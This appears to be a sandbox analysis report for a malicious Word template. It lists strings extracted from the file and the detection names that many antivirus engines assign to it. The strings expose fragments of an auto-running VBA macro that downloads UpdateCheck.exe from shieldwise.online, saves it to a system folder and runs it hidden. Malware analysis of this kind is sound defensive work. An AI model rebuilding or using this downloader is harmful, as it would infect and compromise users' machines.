Static | ZeroBOX
No static analysis available.
Testing
[Content_Types].xml
_rels/.rels
theme/theme/themeManager.xml
theme/theme/theme1.xml
PxzSq]y<u
b!e9#i
theme/theme/_rels/themeManager.xml.rels
K(M&$R(.1
[Content_Types].xmlPK
_rels/.relsPK
theme/theme/themeManager.xmlPK
theme/theme/theme1.xmlPK
theme/theme/_rels/themeManager.xml.relsPK
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
Mohammed Alkuwari
Testing.dot
Mohammed Alkuwari
Microsoft Office Word
Attribut
e VB_Nam
e = "Thi
sDocumen
0{00020P906-
$0046}
|Global
dCreat
ateDeriv
Bustomi
Microsoft.XMLHTTP
ADODB.Stream$
UpdateCheck.exe
http://www.shieldwise.online/UpdateCheck.exe'
UpdateCheck.exe
Attribut
e VB_Nam
e = "New
Macros"
Sub My
Dim myUR@L As S
://www.s
hieldwis
e.online
/UpdateC
heck.exeC
[ObjecBt
=0 Cre
MLHTTP"
3.Open @"GET",
False
esponseBHody
M.@Status
00 Then
aADODB
/SaveT
oFile ("G
NE nd IfC Pa
Win64x
Project1
stdole
TemplateProject
ThisDocument<
_Evaluate
Office
Module1b
NewMacros
AutoOpen
Documentj
MyMacro+
WinHttpReq
CreateObject
ResponseBodyP
Status
oStreamt
SaveToFile
ShellV
vbHideEnd
_B_var_oStream
_B_var_sleep
vbHide
_B_var_Path
Template
Project
\G{00020
0046}#
2.0#0#C:
\Windows
\System3
e2.tlb
#OLE Aut
omation
EOffic
8D04C-5B
FA-101B-
m Files\@Common
icrosoft
Shared\
OFFICE16
\MSO.DLL
M 16.0
ThisDocu
ThisDocument
NewMacros
TemplateProject
C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL
C:\Program Files\Microsoft Office\root\Office16\MSWORD.OLB
C:\Windows\System32\stdole2.tlb
stdole
C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL
Office
MyMacro
VBE7.DLL
ThisDocument
NewMacros
ID="{238DF8BB-2409-4B1C-90AE-A81E932A89C8}"
Document=ThisDocumeP
nt/&H00000000
Module=NewMacros
Name="TemplateProject"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="737182C929CD29CD29CD29CD"
DPB="1E1CEFA631FADDFBDDFBDD"
GC="C9CB38BD39BD3942"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
ThisDocument=0, 0, 0, 0, C
NewMacros=38, 38, 2116, 1050,
Microsoft Word 97-2003 Document
MSWordDoc
Word.Document.8
Normal
Default Paragraph Font
Table Normal
No List
!TemplateProject.NewMacros.MyMacro
!TEMPLATEPROJECT.NEWMACROS.MYMACRO
Unknown
Times New Roman
Symbol
Calibri
Calibri Light
Cambria Math
Mohammed Alkuwari
Mohammed Alkuwari
Root Entry
1Table
WordDocument
SummaryInformation
DocumentSummaryInformation
Macros
ThisDocument
N0{00020906-0000-0000-C000-000000000046}
2NewMacros
__SRP_2
__SRP_3
_VBA_PROJECT
$*\Rffff*0v6788865f
*\R0*#17
*\R0*#8
*\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications
*\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files\Microsoft Office\root\Office16\MSWORD.OLB#Microsoft Word 16.0 Object Library
*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\System32\stdole2.tlb#OLE Automation
*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library
ThisDocument
0E6788842c
ThisDocument
NewMacros
0v6788865f
NewMacros
__SRP_0
__SRP_1
PROJECTwm
Status
http://www.shieldwise.online/UpdateCheck.exe
Microsoft.XMLHTTP
ResponseBody
ADODB.Stream
C:\Windows\debug\UpdateCheck.exe
SaveToFile
UpdateCheck.exe
C:\Temp\UpdateCheck.exen
tThisDocument
sNewMacros
PROJECT
CompObj
Antivirus Signature
Bkav Clean
Lionic Trojan.MSWord.Generic.4!c
Elastic malicious (high confidence)
DrWeb Clean
MicroWorld-eScan Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh BehavesLike.OLE2.Downloader.nx
McAfee Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
Symantec Clean
ESET-NOD32 Clean
Cynet Malicious (score: 99)
TrendMicro-HouseCall Clean
Avast VBA:Downloader-GHD [Trj]
ClamAV Doc.Downloader.Generic-10015045-0
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Trojan.Script.MLW.dnxmzd
ViRobot DOC.Z.Agent.35840.BHD
Rising Heur.Macro.Downloader.g (CLASSIC)
Sophos Clean
F-Secure Heuristic.HEUR/Macro.Downloader.QU.Gen
Baidu VBA.Trojan-Downloader.Agent.dvv
Zillya Clean
TrendMicro Clean
FireEye Clean
Emsisoft Clean
Ikarus Clean
GData Clean
Jiangmin Trojan.MSOffice.SAgent.ar
Google Detected
Avira W97M/YAV.Minerva.irpye
MAX Clean
Antiy-AVL Clean
Kingsoft Win32.Troj.Undef.a
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft TrojanDownloader:O97M/Powdow.RVCE!MTB
Varist W97M/Agent.AGM.gen!Eldorado
AhnLab-V3 Clean
Acronis suspicious
VBA32 Clean
ALYac Clean
TACHYON Clean
Zoner Clean
Tencent Heur.MSWord.Downloader.d
Yandex Clean
SentinelOne Static AI - Malicious OLE
MaxSecure Clean
Fortinet WM/Agent.DKE!tr
AVG VBA:Downloader-GHD [Trj]
Panda Clean
No IRMA results available.